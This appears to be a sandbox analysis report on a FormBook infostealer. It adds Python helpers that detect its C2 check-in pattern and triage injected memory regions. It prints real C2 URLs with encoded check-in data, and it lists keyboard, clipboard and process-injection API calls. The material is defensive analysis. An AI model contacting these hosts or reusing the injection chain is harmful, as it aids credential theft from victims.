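What ties the three GETs and the POST together is not any single header but the shape of the traffic: the same URI path /0so0/ requested from three unrelated hosts, one long base64-looking parameter (X430XLq0) carried in the query or the POST body, Connection: close on every request, and a fixed, years-old Chrome 44 User-Agent. The example below is added to this page and is neither the report's own logic nor the ETPRO signatures: it parses raw request text and applies that check to requests constructed from the page's hosts, paths, query strings and POST body, with one constructed benign request for contrast. The base64 regex, the 40-character threshold and the three-host minimum are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# User-Agent present on every check-in in this report (Chrome 44 on Windows 7 WOW64).
UA_FORMBOOK = ("Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 "
               "(KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36")
# A long run of base64 characters with optional padding (threshold is an assumption).
B64_BLOB = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")


def build_request(method, host, target, body=None, ua=UA_FORMBOOK, connection="close"):
    """Constructed raw HTTP/1.1 request text used as sample data for this example."""
    lines = [f"{method} {target} HTTP/1.1", f"Host: {host}",
             f"User-Agent: {ua}", f"Connection: {connection}"]
    if body is not None:
        lines += ["Content-Type: application/x-www-form-urlencoded",
                  f"Content-Length: {len(body)}"]
    return "\r\n".join(lines) + "\r\n\r\n" + (body or "")


# Hosts, paths, query strings and the POST body are copied from this report;
# the last request (www.example.com) is constructed as a benign control.
SAMPLE_REQUESTS = [
    build_request("GET", "www.goodroothealth.com",
                  "/0so0/?X430XLq0=CY1s0XH7bNWttwV9rZ4SbfagXQ6dqpRCQvxAN47rZ58SWMnAte1QXQdn29aNO6h1oK8GMPzGoaIoZ8sBEayCkb2ait1G89/ayPLVJ4jhwFoJQSPoL8Uww1rncwUMKC4qFA==&Wd=vjk8lhT0U4"),
    build_request("GET", "www.make-l.ru",
                  "/0so0/?Wd=vjk8lhT0U4&X430XLq0=SUPNUPL8X55ZGDaBFxP5SDbwzWvdce9LIUPHC0QIzt1ZKzL94hFLYJx7/4VaKoGV20qcYSFkx0JiG8qMm/Id/bOZDN/8qZd0HZpra/ntz1I1MPsqBdN1VMBNg4zQsHhwAw=="),
    build_request("GET", "www.kguyreoalpha.shop",
                  "/0so0/?X430XLq0=ZXsyqv6OWO1jdfmZwPHK8dAntN05Z+dsmugw9BJBTbqyaa2WOVN+U2naZpjsCmE4tUAeXtTgCCsmM8Dup6ejRXHoa4TAR4CFgRPYrdUpMYgqMRztZg/3Zk7YYa9ZW1B17w==&Wd=vjk8lhT0U4"),
    build_request("POST", "www.make-l.ru", "/0so0/",
                  body="X430XLq0=fWntX473HadKNHPWPQ/TURO6ymnYe55KNkHXbVQ46bp5DAGumisgX69djJkYA5iI9k3jUhIy/AUcHZSP1esQ8LOjXfWYh4tlHbxJG5Pj1j0jMeYzPOBsT4YGqpj+z3kZFokVSqosQeNaGYWPaRPJ4DuiJJkDelG20HgJTY9hYLdwv2O2x/dwcaPV2GApV2KTUmSmfeY="),
    build_request("GET", "www.example.com", "/index.html?lang=en",
                  ua="Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/126.0",
                  connection="keep-alive"),
]


def split_params(qs):
    """Split k=v&k=v without percent-decoding: the blobs above contain '+' and '/',
    and urllib's parse_qsl would turn '+' into a space and break the base64 test."""
    params = {}
    for pair in qs.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params[key] = value
    return params


def parse_request(raw):
    """Minimal HTTP/1.1 request parser: request line, headers, optional body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    params = split_params(url.query if method == "GET" else body)
    return {"method": method, "path": url.path, "host": headers.get("host", ""),
            "ua": headers.get("user-agent", ""),
            "connection": headers.get("connection", "").lower(), "params": params}


def request_indicators(req):
    """Per-request traits the report's check-ins share; each alone is weak evidence."""
    found = []
    if req["ua"] == UA_FORMBOOK:
        found.append("ua_chrome44_win7_wow64")
    if req["connection"] == "close":
        found.append("connection_close")
    blobs = [v for v in req["params"].values() if B64_BLOB.match(v)]
    if len(blobs) == 1 and len(req["params"]) <= 2:
        found.append("single_base64_blob")
    return found


def cluster_by_path(reqs, min_hosts=3):
    """The strong signal: one URI path carrying a base64 blob, replayed against
    several unrelated hosts. Returns {path: sorted list of hosts}."""
    hosts = defaultdict(set)
    for r in reqs:
        if "single_base64_blob" in request_indicators(r):
            hosts[r["path"]].add(r["host"])
    return {path: sorted(h) for path, h in hosts.items() if len(h) >= min_hosts}


if __name__ == "__main__":
    parsed = [parse_request(r) for r in SAMPLE_REQUESTS]
    for r in parsed:
        print(r["method"], r["host"], r["path"], request_indicators(r))
    print(cluster_by_path(parsed))
```

The per-request traits are deliberately kept separate from the clustering step: an old User-Agent or a Connection: close header on its own is common enough in legitimate traffic, whereas one path with one opaque parameter hitting three or more unrelated hosts from the same client is the pattern worth paging on. When running this over real proxy logs, bound the clustering to a time window per source host so that unrelated sites sharing a generic path like `/` do not merge.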
Source: openfiles.exe, 00000005.00000002.3254850708.00000000051B8000.00000004.10000000.00040000.00000000.sdmp, HCyQCFLUGWqlxNRVXC.exe, 00000006.00000002.3254422151.0000000002D98000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://make-l.ru/0so0/?Wd=vjk8lhT0U4&X430XLq0=SUPNUPL8X55ZGDaBFxP5SDbwzWvdce9LIUPHC0QIzt1ZKzL94hFLYJ
Source: HCyQCFLUGWqlxNRVXC.exe, 00000006.00000002.3255683162.0000000004B21000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.kguyreoalpha.shop
Source: HCyQCFLUGWqlxNRVXC.exe, 00000006.00000002.3255683162.0000000004B21000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.kguyreoalpha.shop/0so0/
Source: openfiles.exe, 00000005.00000003.2577055381.00000000073FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: openfiles.exe, 00000005.00000003.2577055381.00000000073FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: openfiles.exe, 00000005.00000003.2577055381.00000000073FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: openfiles.exe, 00000005.00000003.2577055381.00000000073FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: openfiles.exe, 00000005.00000003.2577055381.00000000073FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: openfiles.exe, 00000005.00000003.2577055381.00000000073FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: openfiles.exe, 00000005.00000003.2577055381.00000000073FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: openfiles.exe, 00000005.00000003.2574125163.000000000279C000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000005.00000002.3253131424.0000000002776000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: openfiles.exe, 00000005.00000003.2574125163.000000000279C000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000005.00000002.3253131424.0000000002796000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: openfiles.exe, 00000005.00000002.3253131424.0000000002776000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: openfiles.exe, 00000005.00000003.2574125163.000000000279C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
Source: openfiles.exe, 00000005.00000002.3253131424.0000000002776000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: openfiles.exe, 00000005.00000003.2574125163.000000000279C000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000005.00000002.3253131424.0000000002776000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: openfiles.exe, 00000005.00000003.2574125163.000000000279C000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000005.00000002.3253131424.0000000002796000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: openfiles.exe, 00000005.00000003.2573492642.00000000073D9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: openfiles.exe, 00000005.00000003.2577055381.00000000073FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: openfiles.exe, 00000005.00000003.2577055381.00000000073FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: C:\Users\user\Desktop\F2024-202202.exe | Code function 0_2_001F425A: OpenClipboard, IsClipboardFormatAvailable, IsClipboardFormatAvailable, GetClipboardData, CloseClipboard, GlobalLock, CloseClipboard, GlobalUnlock, IsClipboardFormatAvailable, GetClipboardData, GlobalLock, GlobalUnlock, IsClipboardFormatAvailable, GetClipboardData, GlobalLock, DragQueryFileW, DragQueryFileW, DragQueryFileW, GlobalUnlock, CountClipboardFormats, CloseClipboard
Source: C:\Users\user\Desktop\F2024-202202.exe | Code function 0_2_001F4458: OpenClipboard, EmptyClipboard, GlobalAlloc, GlobalLock, _wcscpy, GlobalUnlock, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard
Source: C:\Users\user\Desktop\F2024-202202.exe | Code function 0_2_001E0219: GetKeyboardState, GetAsyncKeyState, GetKeyState, GetKeyState, GetAsyncKeyState, GetKeyState, GetAsyncKeyState, GetKeyState, GetAsyncKeyState, GetKeyState, GetAsyncKeyState, GetKeyState
Source: C:\Users\user\Desktop\F2024-202202.exe | Code function 0_2_0020CDAC: DefDlgProcW, SendMessageW, GetWindowLongW, SendMessageW, SendMessageW, _wcsncpy, GetKeyState, GetKeyState, GetKeyState, SendMessageW, GetKeyState, SendMessageW, SendMessageW, SendMessageW, ImageList_SetDragCursorImage, ImageList_BeginDrag, SetCapture, ClientToScreen, ImageList_DragEnter, InvalidateRect, ReleaseCapture, GetCursorPos, ScreenToClient, SendMessageW, SendMessageW, SendMessageW, SendMessageW, SendMessageW, SendMessageW, SendMessageW, GetCursorPos, ScreenToClient, GetParent, SendMessageW, SendMessageW, ClientToScreen, TrackPopupMenuEx, SendMessageW, SendMessageW, ClientToScreen, TrackPopupMenuEx, GetWindowLongW

            E-Banking Fraud

            Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000005.00000002.3252950287.0000000002650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2345744782.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.3254116085.00000000033E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.3252870052.00000000005F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3255683162.0000000004AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.3252524118.0000000000130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2345390681.0000000003280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2345007571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
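The MEMORY rows above point at Joe Sandbox process-memory dumps, and the dump name itself carries the region's base address, page protection and memory type, which is the first thing to read off a FormBook hit before opening the dump. The Python below is an added triage helper, not part of the report and not Joe Sandbox code, that decodes those names and flags executable memory that is either writable or not backed by a loaded image. It assumes a field layout (process index, context, dump id, base, protection, unknown, type, unknown) that is inferred from the values on this page rather than from documented Joe Sandbox output; the two fields marked unknown are deliberately not interpreted. The process-index mapping comes from the Source rows of this report (0 = F2024-202202.exe, 2 = svchost.exe, 4 = HCyQCFLUGWqlxNRVXC.exe, 5 = openfiles.exe); index 6 is not named in this section.

```python
"""Added triage helper for the Yara-hit memory dumps of this report (not Joe Sandbox code).

ASSUMPTION: the dotted fields of a .sdmp name are read as
    proc . ctx . ident . base . protect . f6 . memtype . f8
This layout is inferred from the values on this page (field 5 holds PAGE_*
constants, field 7 holds MEM_IMAGE / MEM_MAPPED / MEM_PRIVATE); it is not a
documented format, and f6 / f8 are deliberately left uninterpreted.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# MEMORY_BASIC_INFORMATION constants (winnt.h).
PAGE_EXECUTE_MASK = 0x10 | 0x20 | 0x40 | 0x80  # PAGE_EXECUTE, _READ, _READWRITE, _WRITECOPY
PAGE_WRITE_MASK = 0x04 | 0x08 | 0x40 | 0x80    # PAGE_READWRITE, PAGE_WRITECOPY and their EXECUTE forms
MEM_PRIVATE, MEM_MAPPED, MEM_IMAGE = 0x20000, 0x40000, 0x1000000
TYPE_NAMES = {MEM_PRIVATE: "MEM_PRIVATE", MEM_MAPPED: "MEM_MAPPED", MEM_IMAGE: "MEM_IMAGE"}

# Process index -> image, as the Source rows of this report name them (index 6 is not named here).
PROCESS_NAMES = {0: "F2024-202202.exe", 2: "svchost.exe", 4: "HCyQCFLUGWqlxNRVXC.exe", 5: "openfiles.exe"}

SDMP_RE = re.compile(
    r"(?P<proc>[0-9A-Fa-f]{8})\.(?P<ctx>[0-9A-Fa-f]{8})\.(?P<ident>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<f6>[0-9A-Fa-f]{8})\."
    r"(?P<memtype>[0-9A-Fa-f]{8})\.(?P<f8>[0-9A-Fa-f]{8})\.sdmp"
)


@dataclass(frozen=True)
class Dump:
    proc: int
    base: int
    protect: int
    mem_type: int

    @property
    def executable(self) -> bool:
        return bool(self.protect & PAGE_EXECUTE_MASK)

    @property
    def writable(self) -> bool:
        return bool(self.protect & PAGE_WRITE_MASK)

    @property
    def suspicious(self) -> bool:
        # Executable memory that is also writable, or executable memory not backed
        # by a loaded image (MEM_MAPPED / MEM_PRIVATE): where unpacked payloads live.
        return self.executable and (self.writable or self.mem_type != MEM_IMAGE)

    def describe(self) -> str:
        name = PROCESS_NAMES.get(self.proc, "not named in this section")
        kind = TYPE_NAMES.get(self.mem_type, hex(self.mem_type))
        return f"proc {self.proc} ({name}) base 0x{self.base:08X} protect 0x{self.protect:02X} {kind}"


def parse_dump(text: str) -> Optional[Dump]:
    """Dump described by the first .sdmp name in text; None for .unpack rows and the like."""
    m = SDMP_RE.search(text)
    if m is None:
        return None
    return Dump(int(m["proc"], 16), int(m["base"], 16), int(m["protect"], 16), int(m["memtype"], 16))


def triage(rows: List[str]) -> List[Dump]:
    """Dumps among the rows whose region is executable and writable or not image-backed."""
    dumps = (parse_dump(row) for row in rows)
    return [d for d in dumps if d is not None and d.suspicious]


# The Yara-match rows of this report, copied from the page (constructed input for this example).
REPORT_ROWS = [
    "Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE",
    "Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE",
    "Source: Yara match | File source: 00000005.00000002.3252950287.0000000002650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY",
    "Source: Yara match | File source: 00000002.00000002.2345744782.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY",
    "Source: Yara match | File source: 00000004.00000002.3254116085.00000000033E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY",
    "Source: Yara match | File source: 00000005.00000002.3252870052.00000000005F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY",
    "Source: Yara match | File source: 00000006.00000002.3255683162.0000000004AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY",
    "Source: Yara match | File source: 00000005.00000002.3252524118.0000000000130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY",
    "Source: Yara match | File source: 00000002.00000002.2345390681.0000000003280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY",
    "Source: Yara match | File source: 00000002.00000002.2345007571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY",
]

if __name__ == "__main__":
    for d in triage(REPORT_ROWS):
        print(d.describe())
```

Run over the ten rows, six of the eight dumps come out as PAGE_EXECUTE_READWRITE (0x40) MEM_MAPPED regions, one of them at 0x00400000 in svchost.exe, where a normally loaded executable would be MEM_IMAGE; together with the .unpack hits at 2.2.svchost.exe.400000 that is consistent with the section-mapping injection the signatures list. The two PAGE_READWRITE MEM_PRIVATE dumps in openfiles.exe are not executable and are left out by the filter, but they still matched the FormBook rule (decrypted strings or configuration are the usual reason) and should not be skipped in a manual review.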

            System Summary

            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000005.00000002.3252950287.0000000002650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000002.00000002.2345744782.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000004.00000002.3254116085.00000000033E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000005.00000002.3252870052.00000000005F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000006.00000002.3255683162.0000000004AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000005.00000002.3252524118.0000000000130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000002.00000002.2345390681.0000000003280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000002.00000002.2345007571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_00183B4C This is a third-party compiled AutoIt script.
            Source: F2024-202202.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
            Source: F2024-202202.exe, 00000000.00000000.2005644501.0000000000235000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. (memstr_06596c19-9)
            Source: F2024-202202.exe, 00000000.00000000.2005644501.0000000000235000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer (memstr_8cdabee3-8)
            Source: F2024-202202.exe | String found in binary or memory: This is a third-party compiled AutoIt script. (memstr_6ecb0106-3)
            Source: F2024-202202.exe | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer (memstr_af68acfe-5)
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040B043 NtCreateSection
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040A803 NtGetContextThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042C973 NtClose
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040B263 NtMapViewOfSection
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040AA13 NtSetContextThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040BB33 NtDelayExecution
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040AC23 NtResumeThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040B493 NtCreateFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040A5F3 NtSuspendThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040B6C3 NtReadFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040BF53 NtAllocateVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472B60 NtClose,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472DF0 NtQuerySystemInformation,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034735C0 NtCreateMutant,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03474340 NtSetContextThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03474650 NtSuspendThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472BE0 NtQueryValueKey
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472BF0 NtAllocateVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472B80 NtQueryInformationFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472BA0 NtEnumerateValueKey
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472AD0 NtReadFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472AF0 NtWriteFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472AB0 NtWaitForSingleObject
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472F60 NtCreateProcessEx
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472F30 NtCreateSection
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472FE0 NtCreateFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472F90 NtProtectVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472FA0 NtQuerySection
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472FB0 NtResumeThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472E30 NtWriteVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472EE0 NtQueueApcThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472E80 NtReadVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472EA0 NtAdjustPrivilegesToken
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472D00 NtSetInformationFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472D10 NtMapViewOfSection
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472D30 NtUnmapViewOfSection
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472DD0 NtDelayExecution
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472DB0 NtEnumerateKey
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472C60 NtCreateKey
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472C70 NtFreeVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472C00 NtQueryInformationProcess
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472CC0 NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472CF0 NtOpenProcess
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03472CA0 NtQueryInformationToken
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03473010 NtOpenDirectoryObject
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03473090 NtSetValueKey
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034739B0 NtGetContextThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03473D70 NtOpenThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03473D10 NtOpenProcessToken
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_044F4650 NtSuspendThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_044F4340 NtSetContextThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_044F2C60 NtCreateKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_044F2C70 NtFreeVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_044F2CA0 NtQueryInformationToken,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_044F2D10 NtMapViewOfSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_044F2D30 NtUnmapViewOfSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_044F2DD0 NtDelayExecution,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_044F2DF0 NtQuerySystemInformation,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_044F2EE0 NtQueueApcThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_044F2E80 NtReadVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_044F2F30 NtCreateSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_044F2FE0 NtCreateFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_044F2FB0 NtResumeThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_044F2AD0 NtReadFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_044F2AF0 NtWriteFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_044F2B60 NtClose,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_044F2BE0 NtQueryValueKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_044F2BF0 NtAllocateVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_044F2BA0 NtEnumerateValueKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_044F35C0 NtCreateMutant,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_044F39B0 NtGetContextThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_044F2C00 NtQueryInformationProcess
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_044F2CC0 NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_044F2CF0 NtOpenProcess
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_044F2D00 NtSetInformationFile
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_044F2DB0 NtEnumerateKey
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_044F2E30 NtWriteVirtualMemory
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: 5_2_044F2EA0 NtAdjustPrivilegesToken
